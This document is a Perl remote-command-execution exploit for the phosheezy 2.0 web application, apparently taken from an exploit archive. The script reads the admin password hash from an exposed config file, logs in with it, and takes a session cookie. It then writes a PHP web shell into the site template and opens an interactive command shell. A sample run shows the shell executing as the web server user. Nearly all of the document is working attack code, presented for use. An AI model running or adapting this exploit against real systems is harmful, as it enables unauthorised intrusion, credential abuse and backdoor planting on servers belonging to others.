phosheezy 2.0 - Remote Command Execution

#!/usr/bin/perl

# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: r00t, x0r, jay, BlackLight
# lol at athos

# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
#   ----------------------------
#      Phosheezy RCE Exploit
#         Coded by Osirys
#   ----------------------------
#
# [+] Admin password found:
#     Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

my $host       =  $ARGV[0];
my $pwd_path   =  "/config/password";
my $adm_path   =  "/admin.php";
my $templ_path =  "/admin.php?action=3";

help("-1") unless ($host);
cheek($host) == 1 || help("-2");
&banner;

$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

my $url = $host.$pwd_path;
my $re = get_req($url);

if ($re =~ /([0-9a-f]{40})/) {
    $password = $1;
    print "[+] Admin password found:\n";
    print "    Sha1 pwd: $password  \n";
    adm_log($password);
}
else {
    print "[-] Unable to get sha1 Admin password\n\n";
    exit(0);
}

sub adm_log() {
    my $password =  $_[0];
    my $link     =  $path.".".$adm_path;
    my $post     =  "password=$password&Login=Login";
    my $length   =  length($post);
    my @data;
    my $socket   =  new IO::Socket::INET(
                                          PeerAddr => $h0st,
                                          PeerPort => '80',
                                          Proto    => 'tcp',
                                        ) or die $!;

    my $data = "POST ".$link." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Content-Length: ".$length."\r\n\r\n".
               $post."\r\n";

    $socket->send($data);
    print "[+] Grabbing server headers to get a valid SESSION ID ..\n";

    while (my $e = <$socket>) {
        push(@data,$e);
    }
    foreach my $e(@data) {
        if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) {
            $log_ = 1;
            print "[+] Succesfully logged in as Administrator\n";
        }
        elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
            $phpsessid = $1;
            print "[+] SESSION ID grabbed: $phpsessid\n";
        }
    }

    (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n";
    RCE_create($phpsessid);
}

sub RCE_create() {
    my $phpsessid = $_[0];
    my $link     =  $path.".".$templ_path;
    my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit".
               "le></head><body bgcolor=\"#ffffff\" text=\"#0000".
               "00\">&footer=</body></html><!-- cmd --><?php sys".
               "tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout";
    my $length =  length($code);

    my $socket = new IO::Socket::INET(
                                       PeerAddr => $h0st,
                                       PeerPort => '80',
                                       Proto    => 'tcp',
                                     ) or die $!;

    my $data = "POST ".$link." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Content-Length: ".$length."\r\n\r\n".
               "$code\r\n";

    $socket->send($data);

    while (my $e = <$socket>) {
        if ($e =~ /Edit layout again/) {
            $rce_c = 1;
            print "[+] Template edited, RCE Vulnerability Created !\n";
        }
    }

    $rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n";
    &exec_cmd;
}

sub exec_cmd {
    print "shell\$> ";
    $cmd = <STDIN>;
    $cmd !~ /exit/ || die "[-] Quitting ..\n";
    $exec_url = ($host."/index.php?cmd=".$cmd);
    $re = get_req($exec_url);
    if ($re =~ /<!-- cmd -->(.*)/) {
        my $cmd = $1;
        $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/;
        print "$cmd\n";
        &exec_cmd;
    }
    else {
        print "[-] Undefined output or bad cmd !\n";
        &exec_cmd;
    }
}

sub get_req() {
    $link   = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub get_data() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $h0st !~ /www/ || $h0st =~ s/www\.//;
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
}

sub banner {
    print "\n".
          "  ---------------------------- \n".
          "     Phosheezy RCE Exploit     \n".
          "        Coded by Osirys        \n".
          "  ---------------------------- \n\n";
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "\n[-] Cheek that you provide a hostname address!\n";
    }
    elsif ($error == -2) {
        &banner;
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}

# milw0rm.com [2009-01-14]